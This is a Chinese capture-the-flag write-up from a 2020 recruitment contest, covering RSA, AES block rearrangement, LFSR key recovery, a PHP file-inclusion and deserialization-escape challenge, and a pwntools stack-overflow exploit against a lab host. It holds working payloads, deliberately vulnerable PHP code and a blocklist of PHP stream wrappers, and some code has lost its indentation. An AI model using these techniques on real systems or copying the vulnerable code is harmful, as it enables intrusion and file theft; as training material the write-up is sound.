2020年三级头招新题分享

louzheng

RSA SE mini Lite

from Crypto.Util.number import *
from sympy import *
import random
import gmpy2
n =18114138754310621017437070639972132429972271750799956905263835837038290896899642
22429293849673416618370903981382983313501379006944656561578717033150489666805622
18381583492234809766186263928198778173879716031928865119782986796379246661607113
61404605139565796658090076834010426749378093154633429348214307663814337303984758
22122399005277
m =
23828702134706993191813618349089631194416962808374674351868095972893460538553669
43083694874977707513960812382797390034179413010139329925537910423553509074549104
91531046009938080815467040033153294707885899151966305020733888238272179353489194
02901060672679022434872535989297231744052462415153055365482935318522006235849279
5173044044354
x1 =
63682779159294607735266742848022251174979840621017212554669993758714625240889215
040437
x2 =
74400739512951960703389108337197205260413616692650015300830030383612166884668518
56468597177904926076553396864457297362597022510487666722636336144498342768183036
069
e = 0x10003
e = gmpy2.mpz(e)
list1=[]
a1=9673
a2=3383
b1=3878
b2=7661
y1=x2 * a1
y2=x2 * a2
p=nextprime(x1 * b1+x2 * a1)
q=nextprime(x1 * b2+x2 * a2)
phi = (p-1) * (q-1)
d = gmpy2.invert(e, phi)
c=gmpy2.mpz(m)
m=pow(c,d,n)
print(n)
print(p * q)
print(m)
flag=long_to_bytes(m)
print(flag)

louzheng

EasyAES

很明显是分组加密，要想办法把admin后面得false变成true
所以第一组先将username这一部分十六个凑齐，再弄一个lz(凑前面) tru，空格加上tru正好16个
因为这一组最后第四部分是e}加填充，所以前面补就用到了tru。
然后第二组就是通过使username等于lzlzlz然后false刚好到第三部分，然后将第一组得第二部分替换这
一部分，然后第一组得第四部分放这个最后面，然后提交则完成。

louzheng

EasyLFSR

先再一次异或复原到二进制字符串。
f=open("cipher.bin","rb")
byte=f.read()
f.close()
t=open("plain.txt","r")
plain=t.read()
t.close()
lens = len(plain)
s=''
put = open("out","w")
print(len(byte))
print(len(plain))
for i in range(lens):
s+='{:08b}'.format(ord(byte[i])^ord(plain[i]))
put.write(s)

然后因为output长度已经大于N两倍了，所以可以使用使用BM算法求出mask

N = 256
F = GF(2)
with open('out.txt') as f:
output = f.read()
output = list(map(int, output))
R = [vector(F, N) for i in range(N)]
for i in range(N):
for j in range(N):
R[i][j] = output[i+j]
M = Matrix(F, R)
vec = [vector(F, 1) for i in range(N)]
for i in range(N):
vec[i][0] = output[256+i]
N = Matrix(F, vec)
MM = M.inverse() * N
res = []
for i in range(256):
res.append(MM[i][0])
print(int("0b" + "".join(map(str,res[::-1])), 2))

然后通过output前256位逆推可以求出key，即flag的主体部分。

import hashlib
mask2 =
'1010110000011000110111111101111010100110100000010111010100011111011001100001100
10101110001110100001111011100011110000011110010001000000010111110000000010010100
11011100100001101100110110100001111101000010111011110000001001011011001000001111
00011100010010011'
out2 =
'1101001100101110000010001101001011110100111111001000000110011010110000100100010
00011111111110111011011101001101010100101011001111101100100000101111100111011100
11110000000100110111011011001011111101100010110011000101110001011001110101110110
01010010101010110'
r2 = ''
list2=[]
for i in range(256):
if mask2[i] == '1':
list2.append(1)
else:
list2.append(0)
for i in range(256):
output2 = '?' + out2[:255]
ans=int(out2[-1])
for j in range(1,256):
if list2[j] == 1:
ans^=int(output2[j])
r2 = str(ans) + r2
out2 = str(ans) + out2[:255]
flag2 = hex(int(r2,2))
print(flag2)
nFLAG = "l3hctf{"+hashlib.sha256(flag2[2:].rstrip('L')).hexdigest()+"}"
print(nFLAG)

louzheng

unserialize

通过base64读到了index.php的源码。
php://filter/read=convert.base64-encode/resource=index.php

<meta charset="utf8">
<?php
error_reporting(0);
echo "<form action='/?file=' method='get'><input name='file' type='text'><input
type='submit'></br>";
$file =$_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") ||
stristr($file,"phar://") || stristr($file,"data:")||stristr($file,"flag.php")){
die("hacker!");
}
else{
include $file;
}
function Woshishui($d) {
return str_replace('xxx', 'yy', $d);
}
class A{
public $username;
public $password;
function __construct($a, $b){
$this->username = $a;
$this->password = $b;
}
}
class B{
public $b = 'hahaha';
function __destruct(){
$c =$this->b;
echo $c;
}
}
class C{
public $c;
function __toString(){
//flag.php
echo file_get_contents($this->c);
return 'good';
}
}
$x=$_GET['a'];<br />$y=$_GET['b'];<br />$a = new A($x,$y);
$b = unserialize(Woshishui(serialize($a)));
?>
通过这一段代码，可以发现有明显的反序列化字符逃逸。通过woshishui这个函数，xxx会变成yy，所以
每三个xxx就会使字符串长度减一，
$a=new B();<br />$a->b=new C();
$a->b->c='flag.php';
$b=new A('a',$a);<br /> echo serialize($b);
得到
O:1:"A":2:{s:8:"username";s:1:"a";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:
{s:1:"c";s:8:"flag.php";}}}
";s:8:"password";O:1:"
我们要吞了这么多22位，但实际上构造之后是两位数，23位
所以
最后尝试大概是这样
O:1:"A":2:
{s:8:"username";s:69:"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxx";s:8:"password";s:72:"";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:
{s:1:"c";s:8:"flag.php";}}

louzheng

easystack-1

程序中有个很明显的read栈溢出，栈大小是0x30 。然后在date函数中有一个lea 到flag并输出的，所以
直接通过栈溢出返回到那个位置即可。

exp

from pwn import *
ip = '10.12.164.189'
context(arch = 'amd64', os = 'linux', log_level='debug')
elf = ELF('./ezstack')
port = 10005
p = remote(ip,port)
p.recvline()
p.recvline()
flagaddr = elf.symbols['date']
flagaddr+=29
payload = 'A'*56+p64(flagaddr)
print(payload)
p.send(payload)
str1=p.recvall()
print(str1)